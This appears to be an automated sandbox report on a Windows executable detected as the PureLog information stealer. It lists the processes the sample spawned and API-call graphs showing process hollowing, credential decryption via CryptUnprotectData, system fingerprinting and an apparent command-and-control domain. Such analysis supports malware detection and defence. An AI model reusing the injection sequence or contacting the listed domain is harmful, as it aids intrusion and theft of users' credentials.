                                                      2025-01-04 21:58:17 UTC54INData Raw: 33 30 0d 0a 65 32 2b 6c 31 45 53 37 36 66 57 63 78 76 4f 31 74 53 6e 53 30 6e 6f 41 55 76 4f 59 59 67 75 32 48 68 31 63 42 6b 69 36 33 78 41 67 4d 67 3d 3d 0d 0a
                                                      Data Ascii: 30e2+l1ES76fWcxvO1tSnS0noAUvOYYgu2Hh1cBki63xAgMg==
                                                      2025-01-04 21:58:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Click to jump to process

                                                      Click to jump to process

                                                      Click to dive into process behavior distribution

                                                      Click to jump to process

                                                      Target ID:0
                                                      Start time:16:58:06
                                                      Start date:04/01/2025
                                                      Path:C:\Users\user\Desktop\file.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                      Imagebase:0x100000
                                                      File size:390'696 bytes
                                                      MD5 hash:E9F13D0B330A73ECE569B6115D2AC4F0
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1771192716.0000000000102000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1994621787.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:1
                                                      Start time:16:58:06
                                                      Start date:04/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:2
                                                      Start time:16:58:06
                                                      Start date:04/01/2025
                                                      Path:C:\Users\user\Desktop\file.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                      Imagebase:0xb00000
                                                      File size:390'696 bytes
                                                      MD5 hash:E9F13D0B330A73ECE569B6115D2AC4F0
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:5
                                                      Start time:16:58:06
                                                      Start date:04/01/2025
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6496 -s 160
                                                      Imagebase:0x610000
                                                      File size:483'680 bytes
                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:11.1%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:57.1%
                                                        Total number of Nodes:14
                                                        Total number of Limit Nodes:2
                                                        execution_graph 1537 24f80be 1538 24f80d8 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 1537->1538 1539 24f80c6 GetPEB 1537->1539 1540 24f817f WriteProcessMemory 1538->1540 1542 24f8087 1538->1542 1539->1538 1541 24f81c4 1540->1541 1543 24f81c9 WriteProcessMemory 1541->1543 1544 24f8206 WriteProcessMemory Wow64SetThreadContext ResumeThread 1541->1544 1542->1539 1543->1541 1545 2360b80 1548 2360b9e 1545->1548 1546 2360d9b 1548->1546 1549 23606e0 1548->1549 1550 2362ad0 VirtualProtect 1549->1550 1552 2362b58 1550->1552 1552->1546

                                                        Control-flow Graph

                                                        APIs
                                                        • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,024F7EB3,024F7EA3), ref: 024F80D9
                                                        • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 024F80EC
                                                        • Wow64GetThreadContext.KERNEL32(00000088,00000000), ref: 024F810A
                                                        • ReadProcessMemory.KERNELBASE(00000388,?,024F7EF7,00000004,00000000), ref: 024F812E
                                                        • VirtualAllocEx.KERNELBASE(00000388,?,?,00003000,00000040), ref: 024F8159
                                                        • WriteProcessMemory.KERNELBASE(00000388,00000000,?,?,00000000,?), ref: 024F81B1
                                                        • WriteProcessMemory.KERNELBASE(00000388,00400000,?,?,00000000,?,00000028), ref: 024F81FC
                                                        • WriteProcessMemory.KERNELBASE(00000388,?,?,00000004,00000000), ref: 024F823A
                                                        • Wow64SetThreadContext.KERNEL32(00000088,04970000), ref: 024F8276
                                                        • ResumeThread.KERNELBASE(00000088), ref: 024F8285
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1994591365.00000000024F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 024F7000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_24f7000_file.jbxd
                                                        Similarity
                                                        • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                        • String ID: CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                        • API String ID: 2687962208-232383841
                                                        • Opcode ID: 956aea2136c6b0205ab5bf3fe1e0123e9091b05b22cf94d50ecc47fa332fbd9d
                                                        • Instruction ID: af067eca3e453f78f949477452acff514576a0720390f6372a2c01693ef7d8d7
                                                        • Opcode Fuzzy Hash: 956aea2136c6b0205ab5bf3fe1e0123e9091b05b22cf94d50ecc47fa332fbd9d
                                                        • Instruction Fuzzy Hash: E5B1177660064AAFDB60CF68CC80BDAB3A5FF88714F158125EA0CAB341D774FA51CB94

                                                        Control-flow Graph

                                                        APIs
                                                        • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,024F7EB3,024F7EA3), ref: 024F80D9
                                                        • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 024F80EC
                                                        • Wow64GetThreadContext.KERNEL32(00000088,00000000), ref: 024F810A
                                                        • ReadProcessMemory.KERNELBASE(00000388,?,024F7EF7,00000004,00000000), ref: 024F812E
                                                        • VirtualAllocEx.KERNELBASE(00000388,?,?,00003000,00000040), ref: 024F8159
                                                        • WriteProcessMemory.KERNELBASE(00000388,00000000,?,?,00000000,?), ref: 024F81B1
                                                        • WriteProcessMemory.KERNELBASE(00000388,00400000,?,?,00000000,?,00000028), ref: 024F81FC
                                                        • WriteProcessMemory.KERNELBASE(00000388,?,?,00000004,00000000), ref: 024F823A
                                                        • Wow64SetThreadContext.KERNEL32(00000088,04970000), ref: 024F8276
                                                        • ResumeThread.KERNELBASE(00000088), ref: 024F8285
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1994591365.00000000024F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 024F7000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_24f7000_file.jbxd
                                                        Similarity
                                                        • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                        • String ID: TerminateProcess
                                                        • API String ID: 2687962208-2873147277
                                                        • Opcode ID: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
                                                        • Instruction ID: 5d1be478efbbd8a6fedeac8927ff096e8b434248e1d4208b68cb2940b959e347
                                                        • Opcode Fuzzy Hash: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
                                                        • Instruction Fuzzy Hash: DB311C72240646ABD774CF54CC91FEA7365BFC8B15F148509EB09AF680C6B4BA418B94

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 36 23628c1-2362906 39 2362908-2362919 36->39 41 236291f-236292c 39->41 42 2362ab8-2362b56 VirtualProtect 39->42 41->42 43 2362932-236293d 41->43 49 2362b5d-2362b71 42->49 50 2362b58 42->50 43->42 45 2362943-236294e 43->45 45->39 47 2362950-2362958 45->47 48 236295b-2362963 47->48 48->42 51 2362969-2362976 48->51 50->49 51->42 52 236297c-2362988 51->52 53 2362991-2362999 52->53 54 236298a-2362990 52->54 53->42 55 236299f-23629af 53->55 54->53 55->42 56 23629b5-23629be 55->56 56->42 57 23629c4-23629d2 56->57 57->48 58 23629d4-23629e0 57->58 59 23629e6-23629e9 58->59 60 2362aae-2362ab5 58->60 61 23629ec-23629f3 59->61 62 23629f5-23629fc 61->62 63 23629fd-2362a05 61->63 62->63 63->42 64 2362a0b-2362a17 63->64 65 2362a20-2362a28 64->65 66 2362a19-2362a1f 64->66 65->42 67 2362a2e-2362a3e 65->67 66->65 67->42 68 2362a40-2362a49 67->68 68->42 69 2362a4b-2362a6d 68->69 70 2362a77-2362a83 69->70 71 2362a6f-2362a76 69->71 70->42 72 2362a85-2362a94 70->72 71->70 72->42 73 2362a96-2362aa8 72->73 73->60 73->61
                                                        APIs
                                                        • VirtualProtect.KERNELBASE(034F3588,?,?,?,?,?,?,?,?,0010D2FB,00000000,?,02360D9B,?,00000040), ref: 02362B49
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1994431062.0000000002360000.00000040.00000800.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2360000_file.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID:
                                                        • API String ID: 544645111-0
                                                        • Opcode ID: 3cfc12cfd8bda49e1d782d4534fe8fa490287938cd4bd8d956976775d01e2aeb
                                                        • Instruction ID: 1d9a8eda8522721f831fcd857ae88f86764b4c43d09e88c39cd1654a353e9b2f
                                                        • Opcode Fuzzy Hash: 3cfc12cfd8bda49e1d782d4534fe8fa490287938cd4bd8d956976775d01e2aeb
                                                        • Instruction Fuzzy Hash: AC917A71A1415A8FCB11CFADC484AEEFBF1BF89310F69C655E858A7346C374A941CBA0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 74 23606e0-2362b56 VirtualProtect 77 2362b5d-2362b71 74->77 78 2362b58 74->78 78->77
                                                        APIs
                                                        • VirtualProtect.KERNELBASE(034F3588,?,?,?,?,?,?,?,?,0010D2FB,00000000,?,02360D9B,?,00000040), ref: 02362B49
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1994431062.0000000002360000.00000040.00000800.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2360000_file.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID:
                                                        • API String ID: 544645111-0
                                                        • Opcode ID: cd8c0c5e1024ebdeb87ea6570eea7e4af8c4c63c385dfec5f1923d92d3332b3f
                                                        • Instruction ID: 566b8b7c20ae98a856ff68194625873d2ad845f306ad1c6fee5fc6df4828247e
                                                        • Opcode Fuzzy Hash: cd8c0c5e1024ebdeb87ea6570eea7e4af8c4c63c385dfec5f1923d92d3332b3f
                                                        • Instruction Fuzzy Hash: 2221C4B5D0161DAFCB00DF9AD884ADEFBB8FB49310F10812AE918A7241D3756954CFA5

                                                        Execution Graph

                                                        Execution Coverage:7.6%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:48.7%
                                                        Total number of Nodes:189
                                                        Total number of Limit Nodes:16
                                                        execution_graph 13922 4423c5 GetForegroundWindow 13926 444110 13922->13926 13924 4423d1 GetForegroundWindow 13925 4423ec 13924->13925 13927 444124 13926->13927 13927->13924 13928 437180 CoSetProxyBlanket 13929 425713 13930 42571b 13929->13930 13931 42572b RtlExpandEnvironmentStrings 13930->13931 13932 42575c 13931->13932 13932->13932 13938 445260 13932->13938 13934 425a27 13935 425874 13935->13934 13935->13935 13936 425a11 GetLogicalDrives 13935->13936 13937 445260 LdrInitializeThunk 13936->13937 13937->13934 13939 445280 13938->13939 13940 44536e 13939->13940 13942 442080 LdrInitializeThunk 13939->13942 13940->13935 13942->13940 13943 436312 13945 436316 13943->13945 13944 43629a 13945->13944 13946 4363bb SysAllocString 13945->13946 13947 4364d0 13946->13947 13947->13947 13948 421710 13949 42171e 13948->13949 13952 421778 13948->13952 13954 421830 13949->13954 13951 4217ec 13951->13952 13953 41f9a0 LdrInitializeThunk 13951->13953 13953->13952 13955 421840 13954->13955 13955->13955 13956 445260 LdrInitializeThunk 13955->13956 13957 421971 13956->13957 13958 43ce90 13959 43ceb8 13958->13959 13962 43cf2e 13959->13962 13967 442080 LdrInitializeThunk 13959->13967 13960 43d066 13962->13960 13964 43cfc0 13962->13964 13966 442080 LdrInitializeThunk 13962->13966 13964->13960 13968 442080 LdrInitializeThunk 13964->13968 13966->13962 13967->13959 13968->13964 13969 440510 13970 440530 13969->13970 13971 44054e 13969->13971 13970->13971 13977 442080 LdrInitializeThunk 13970->13977 13976 44063e 13971->13976 13978 4404b0 13971->13978 13974 44060d 13974->13976 13981 442080 LdrInitializeThunk 13974->13981 13977->13971 13982 443770 13978->13982 13980 4404ba RtlAllocateHeap 13980->13974 13981->13976 13983 4437a0 13982->13983 13983->13980 13983->13983 13989 430f54 13990 430f64 FreeLibrary 13989->13990 13993 430f8b 13990->13993 13992 43102b GetComputerNameExA 13994 4310af 13992->13994 13993->13992 13993->13993 13994->13994 13995 408a60 13997 408a6f 13995->13997 13996 408d05 ExitProcess 13997->13996 13998 408cee 13997->13998 13999 408a84 GetCurrentProcessId GetCurrentThreadId 13997->13999 14010 442000 13998->14010 14000 408ac3 SHGetSpecialFolderPathW GetForegroundWindow 13999->14000 14001 408abd 13999->14001 14003 408b95 14000->14003 14001->14000 14003->14003 14004 4404b0 RtlAllocateHeap 14003->14004 14005 408c27 14004->14005 14005->13998 14009 40d400 CoInitializeEx 14005->14009 14013 443750 14010->14013 14012 442005 FreeLibrary 14012->13996 14014 443759 14013->14014 14014->14012 14015 42f222 14016 42f280 14015->14016 14016->14016 14017 42f2e8 GetComputerNameExA 14016->14017 14023 40daa3 14024 40dad0 14023->14024 14027 43d0d0 14024->14027 14026 40dc55 14028 43d120 14027->14028 14028->14028 14029 43d529 CoCreateInstance 14028->14029 14030 43d585 SysAllocString 14029->14030 14031 43db6d 14029->14031 14034 43d62c 14030->14034 14033 43db7d GetVolumeInformationW 14031->14033 14040 43db9b 14033->14040 14035 43d634 CoSetProxyBlanket 14034->14035 14036 43db5c SysFreeString 14034->14036 14037 43db52 14035->14037 14038 43d654 SysAllocString 14035->14038 14036->14031 14037->14036 14041 43d740 14038->14041 14040->14026 14041->14041 14042 43d764 SysAllocString 14041->14042 14044 43d78a 14042->14044 14043 43db39 SysFreeString SysFreeString 14043->14037 14044->14043 14045 43db2f 14044->14045 14046 43d7ce VariantInit 14044->14046 14045->14043 14047 43d850 14046->14047 14047->14047 14048 43db1e VariantClear 14047->14048 14048->14045 14049 418ba2 14051 418c10 14049->14051 14050 418fb7 14050->14050 14051->14050 14052 445260 LdrInitializeThunk 14051->14052 14052->14051 14053 43b967 14054 43b97f 14053->14054 14055 43b996 GetUserDefaultUILanguage 14054->14055 14056 43b9e1 14055->14056 14057 434865 14060 414c20 14057->14060 14059 43486a CoSetProxyBlanket 14060->14059 14061 4404e2 14062 4404f0 14061->14062 14063 4404f2 14061->14063 14064 4404f7 RtlFreeHeap 14063->14064 14065 40e16e 14069 409b70 14065->14069 14067 40e17a CoUninitialize 14068 40e1b0 14067->14068 14070 409b84 14069->14070 14070->14067 14071 4180f0 14071->14071 14072 4180f8 14071->14072 14073 418468 CryptUnprotectData 14072->14073 14074 421b30 14086 4450f0 14074->14086 14076 421b77 14077 4404b0 RtlAllocateHeap 14076->14077 14082 42228c 14076->14082 14078 421bd2 14077->14078 14085 421be9 14078->14085 14090 442080 LdrInitializeThunk 14078->14090 14080 421cb9 14080->14082 14092 442080 LdrInitializeThunk 14080->14092 14081 4404b0 RtlAllocateHeap 14081->14085 14085->14080 14085->14081 14091 442080 LdrInitializeThunk 14085->14091 14087 445110 14086->14087 14088 445208 14087->14088 14093 442080 LdrInitializeThunk 14087->14093 14088->14076 14090->14078 14091->14085 14092->14080 14093->14088 14094 40d433 CoInitializeSecurity 14095 430030 14096 430080 14095->14096 14098 43014e 14096->14098 14099 442080 LdrInitializeThunk 14096->14099 14099->14098 14100 4425f2 14101 44261e 14100->14101 14102 442602 14100->14102 14102->14101 14104 442080 LdrInitializeThunk 14102->14104 14104->14101 14105 40e139 14110 437c10 14105->14110 14111 437c3e GetSystemMetrics GetSystemMetrics 14110->14111 14112 437c81 14111->14112 14118 42fb7d 14119 42fb88 14118->14119 14120 42fc5a GetPhysicallyInstalledSystemMemory 14119->14120 14121 42fcb0 14120->14121 14121->14121 14122 40df7f 14123 40df8b 14122->14123 14124 40dfa4 14122->14124 14123->14124 14150 442080 LdrInitializeThunk 14123->14150 14125 40dfee 14124->14125 14151 442080 LdrInitializeThunk 14124->14151 14146 425560 14125->14146 14129 40e02e 14130 425da0 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlAllocateHeap LdrInitializeThunk 14129->14130 14131 40e04e 14130->14131 14132 426010 RtlExpandEnvironmentStrings RtlAllocateHeap LdrInitializeThunk 14131->14132 14133 40e06e 14132->14133 14134 427fc0 RtlAllocateHeap RtlReAllocateHeap LdrInitializeThunk 14133->14134 14135 40e08e 14134->14135 14136 428750 RtlAllocateHeap LdrInitializeThunk 14135->14136 14137 40e097 14136->14137 14138 428b10 RtlAllocateHeap LdrInitializeThunk 14137->14138 14139 40e0a0 14138->14139 14140 42ba20 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings 14139->14140 14141 40e0a9 14140->14141 14142 42a7f0 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings LdrInitializeThunk 14141->14142 14143 40e0c9 14142->14143 14144 437a60 6 API calls 14143->14144 14145 40e0f2 14144->14145 14147 4255d0 14146->14147 14147->14147 14148 4255e6 RtlExpandEnvironmentStrings 14147->14148 14149 425660 14148->14149 14149->14149 14150->14124 14151->14125 14152 442b3b 14153 442b45 14152->14153 14155 442c0e 14153->14155 14156 442080 LdrInitializeThunk 14153->14156 14156->14155 14157 40ebff 14159 40ec5f 14157->14159 14160 40ec7e 14157->14160 14158 40ed2e 14159->14160 14164 442080 LdrInitializeThunk 14159->14164 14160->14158 14163 442080 LdrInitializeThunk 14160->14163 14163->14158 14164->14160

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 43d0d0-43d112 1 43d120-43d18e 0->1 1->1 2 43d190-43d1b6 1->2 3 43d1c0-43d1f8 2->3 3->3 4 43d1fa-43d25f 3->4 5 43d260-43d289 4->5 5->5 6 43d28b-43d2a8 5->6 8 43d2ae-43d2b8 6->8 9 43d3bd-43d3d5 6->9 10 43d2c0-43d31d 8->10 11 43d3e0-43d3ff 9->11 10->10 12 43d31f-43d349 10->12 11->11 13 43d401-43d47b 11->13 14 43d350-43d3af 12->14 15 43d480-43d4c0 13->15 14->14 16 43d3b1-43d3b5 14->16 15->15 17 43d4c2-43d51f 15->17 16->9 18 43d520-43d527 17->18 18->18 19 43d529-43d57f CoCreateInstance 18->19 20 43d585-43d5d5 19->20 21 43db6d-43db99 call 443b60 GetVolumeInformationW 19->21 22 43d5e0-43d605 20->22 26 43dba2-43dba4 21->26 27 43db9b-43db9e 21->27 22->22 24 43d607-43d62e SysAllocString 22->24 32 43d634-43d64e CoSetProxyBlanket 24->32 33 43db5c-43db69 SysFreeString 24->33 29 43dbc7-43dbd2 26->29 27->26 30 43dbd4-43dbdb 29->30 31 43dbde-43dc0b 29->31 30->31 34 43dc10-43dc6a 31->34 35 43db52-43db58 32->35 36 43d654-43d67f 32->36 33->21 34->34 37 43dc6c-43dc97 34->37 35->33 38 43d680-43d6a5 36->38 39 43dca0-43dcdc 37->39 38->38 40 43d6a7-43d732 SysAllocString 38->40 39->39 41 43dcde-43dd02 call 41dce0 39->41 42 43d740-43d762 40->42 46 43dd10-43dd17 41->46 42->42 44 43d764-43d78c SysAllocString 42->44 49 43d792-43d7b4 44->49 50 43db39-43db4e SysFreeString * 2 44->50 46->46 48 43dd19-43dd2c 46->48 51 43dd32-43dd45 call 408430 48->51 52 43dbb0-43dbc1 48->52 56 43d7ba-43d7bd 49->56 57 43db2f-43db35 49->57 50->35 51->52 52->29 53 43dd4a-43dd51 52->53 56->57 59 43d7c3-43d7c8 56->59 57->50 59->57 60 43d7ce-43d843 VariantInit 59->60 61 43d850-43d8d3 60->61 61->61 62 43d8d9-43d8f2 61->62 63 43d8f6-43d8fb 62->63 64 43d901-43d90a 63->64 65 43db1e-43db2b VariantClear 63->65 64->65 66 43d910-43d91f 64->66 65->57 67 43d921-43d926 66->67 68 43d95d 66->68 70 43d93c-43d940 67->70 69 43d95f-43d97d call 408270 68->69 79 43d983-43d997 69->79 80 43dac9-43dada 69->80 72 43d942-43d94b 70->72 73 43d930 70->73 76 43d952-43d956 72->76 77 43d94d-43d950 72->77 75 43d931-43d93a 73->75 75->69 75->70 76->75 78 43d958-43d95b 76->78 77->75 78->75 79->80 81 43d99d-43d9a3 79->81 82 43dae1-43daf2 80->82 83 43dadc 80->83 84 43d9b0-43d9ba 81->84 85 43daf4 82->85 86 43daf9-43db1b call 4082a0 call 408280 82->86 83->82 87 43d9d0-43d9d6 84->87 88 43d9bc-43d9c1 84->88 85->86 86->65 91 43d9f5-43da07 87->91 92 43d9d8-43d9db 87->92 90 43da60-43da76 88->90 94 43da79-43da7f 90->94 96 43da8b-43da94 91->96 97 43da0d-43da10 91->97 92->91 95 43d9dd-43d9f3 92->95 94->80 100 43da81-43da83 94->100 95->90 101 43da96-43da98 96->101 102 43da9a-43da9d 96->102 97->96 103 43da12-43da5f 97->103 100->84 104 43da89 100->104 101->94 105 43dac5-43dac7 102->105 106 43da9f-43dac3 102->106 103->90 104->80 105->90 106->90
                                                        APIs
                                                        • CoCreateInstance.OLE32(80838290,00000000,00000001,?,00000000), ref: 0043D572
                                                        • SysAllocString.OLEAUT32 ref: 0043D608
                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043D646
                                                        • SysAllocString.OLEAUT32 ref: 0043D6A8
                                                        • SysAllocString.OLEAUT32 ref: 0043D765
                                                        • VariantInit.OLEAUT32(?), ref: 0043D7D6
                                                        • SysFreeString.OLEAUT32(00000000), ref: 0043DB5D
                                                        • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043DB95
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID: String$Alloc$BlanketCreateFreeInformationInitInstanceProxyVariantVolume
                                                        • String ID: fF$CfF$[B$[J$tu$yv${pqv
                                                        • API String ID: 505850577-1972840126
                                                        • Opcode ID: 3ddc2ead7565efc33bb403abcee38b0898e8d98e79c6cb4a9a4b1927beae507d
                                                        • Instruction ID: dd13a90e2492ac68040bcad17eea3e7c9d23fbfdc89757e028f71a1dea91b727
                                                        • Opcode Fuzzy Hash: 3ddc2ead7565efc33bb403abcee38b0898e8d98e79c6cb4a9a4b1927beae507d
                                                        • Instruction Fuzzy Hash: 94621372A183108FE314CF68D88576BBBE1EFD5314F198A2DE4D58B390D7799809CB86

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 111 40e16e-40e1af call 409b70 CoUninitialize 114 40e1b0-40e216 111->114 114->114 115 40e218-40e242 114->115 116 40e250-40e298 115->116 116->116 117 40e29a-40e303 116->117 118 40e310-40e343 117->118 118->118 119 40e345-40e356 118->119 120 40e358-40e366 119->120 121 40e37b-40e383 119->121 122 40e370-40e379 120->122 123 40e385-40e386 121->123 124 40e39b-40e3a5 121->124 122->121 122->122 125 40e390-40e399 123->125 126 40e3a7-40e3ab 124->126 127 40e3bb-40e3c3 124->127 125->124 125->125 128 40e3b0-40e3b9 126->128 129 40e3c5-40e3c6 127->129 130 40e3db-40e3e5 127->130 128->127 128->128 131 40e3d0-40e3d9 129->131 132 40e3e7-40e3eb 130->132 133 40e3fb-40e407 130->133 131->130 131->131 134 40e3f0-40e3f9 132->134 135 40e421-40e54e 133->135 136 40e409-40e40b 133->136 134->133 134->134 138 40e550-40e577 135->138 137 40e410-40e41d 136->137 137->137 139 40e41f 137->139 138->138 140 40e579-40e5af 138->140 139->135 141 40e5b0-40e60a 140->141 141->141 142 40e60c-40e636 call 40c080 141->142 144 40e63b-40e655 142->144
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID: Uninitialize
                                                        • String ID: RYZ[$UGC9$Zb$c[i!$tirepublicerj.shop$yD
                                                        • API String ID: 3861434553-2489493371
                                                        • Opcode ID: 9bb15100d4bb6a15a77dc5872525b3ecedab199ceaceba36afab7cc08321f92a
                                                        • Instruction ID: 966cdb19ca8ac249a37a340b6d4c56d028db331cb6ce3dd003334f0be9ec8841
                                                        • Opcode Fuzzy Hash: 9bb15100d4bb6a15a77dc5872525b3ecedab199ceaceba36afab7cc08321f92a
                                                        • Instruction Fuzzy Hash: C3C1FF7150C3D08BDB348F2598687ABBBE1AFD2304F084D6DD8D95B286D678450A8B96

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 145 421b30-421b7c call 4450f0 148 421b82-421bda call 414c00 call 4404b0 145->148 149 4222dd-4222ed 145->149 155 421bdc-421be7 148->155 156 421be9 155->156 157 421bee-421c03 155->157 158 421ca1-421ca9 156->158 159 421c05 157->159 160 421c0a-421c16 157->160 163 421cab 158->163 164 421cad-421cb7 158->164 161 421c92-421c95 159->161 160->161 162 421c18-421c88 call 442080 160->162 166 421c97 161->166 167 421c99-421c9c 161->167 170 421c8d 162->170 163->164 168 421cb9 164->168 169 421cbe-421cce 164->169 166->158 167->155 171 422272-422282 call 4404d0 168->171 172 421cd0-421cf0 169->172 170->161 180 422284-42228a 171->180 173 421f61 172->173 174 421cf6-421d16 172->174 178 421f63-421f66 173->178 176 421d1b-421d26 174->176 176->176 179 421d28-421d2a 176->179 181 421f68-421f6c 178->181 182 421f6e-421f84 call 4404b0 178->182 185 421d2e-421d31 179->185 186 42228e-4222a2 180->186 187 42228c 180->187 183 421f9c-421f9e 181->183 195 421f86-421f9a 182->195 196 421f88-421f93 182->196 191 421fa4-421fc0 183->191 192 42224b-422250 183->192 189 421d37-421db7 185->189 190 421dbc-421de3 call 4222f0 185->190 193 4222a6-4222ad 186->193 194 4222a4 186->194 187->149 189->185 212 421de5 190->212 213 421dea-421e22 190->213 198 421fc5-421fd0 191->198 201 422252-42225a 192->201 202 42225c-422260 192->202 199 4222cd-4222d0 193->199 200 4222af-4222c8 call 442080 193->200 194->199 195->183 204 422264-422268 196->204 198->198 206 421fd2-421fd6 198->206 208 4222d2-4222d4 199->208 209 4222d6-4222db 199->209 200->199 210 422262 201->210 202->210 204->172 211 42226e-422270 204->211 214 421fd8-421fdb 206->214 208->149 209->180 210->204 211->171 212->173 216 421e27-421e35 213->216 217 42200f-422027 214->217 218 421fdd-42200d 214->218 216->216 219 421e37 216->219 220 42202e-422039 217->220 218->214 221 421e39-421e3c 219->221 222 422040-422059 220->222 223 42203b 220->223 226 421eaa-421ec4 call 4222f0 221->226 227 421e3e-421ea8 221->227 224 422060-42206c 222->224 225 42205b 222->225 228 42210e-422116 223->228 229 4220fd-422102 224->229 230 422072-4220f3 call 442080 224->230 225->229 239 421ec6-421eca 226->239 240 421ecf-421ee6 226->240 227->221 231 42211a-422179 228->231 232 422118 228->232 236 422106-422109 229->236 237 422104 229->237 241 4220f8 230->241 238 42217b-42217e 231->238 232->231 236->220 237->228 242 4221d2-4221e2 238->242 243 422180-4221d0 238->243 239->178 244 421eea-421f5f call 408270 call 414850 call 408280 240->244 245 421ee8 240->245 241->229 246 4221e4-4221e8 242->246 247 422218-42221b 242->247 243->238 244->178 245->244 251 4221ea-4221f1 246->251 249 422234-42223a 247->249 250 42221d-422232 call 4404d0 247->250 256 42223c-42223f 249->256 250->256 252 4221f3-4221ff 251->252 253 422201-42220a 251->253 252->251 257 42220e 253->257 258 42220c 253->258 256->192 261 422241-422249 256->261 262 422214-422216 257->262 258->262 261->204 262->247
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID: !@$,$0$6$p$q$v
                                                        • API String ID: 1279760036-585546663
                                                        • Opcode ID: 68ded5a1127ff787cf997603004e9156167bbfc9199ee1ec6ad3b0f1b8bf95cb
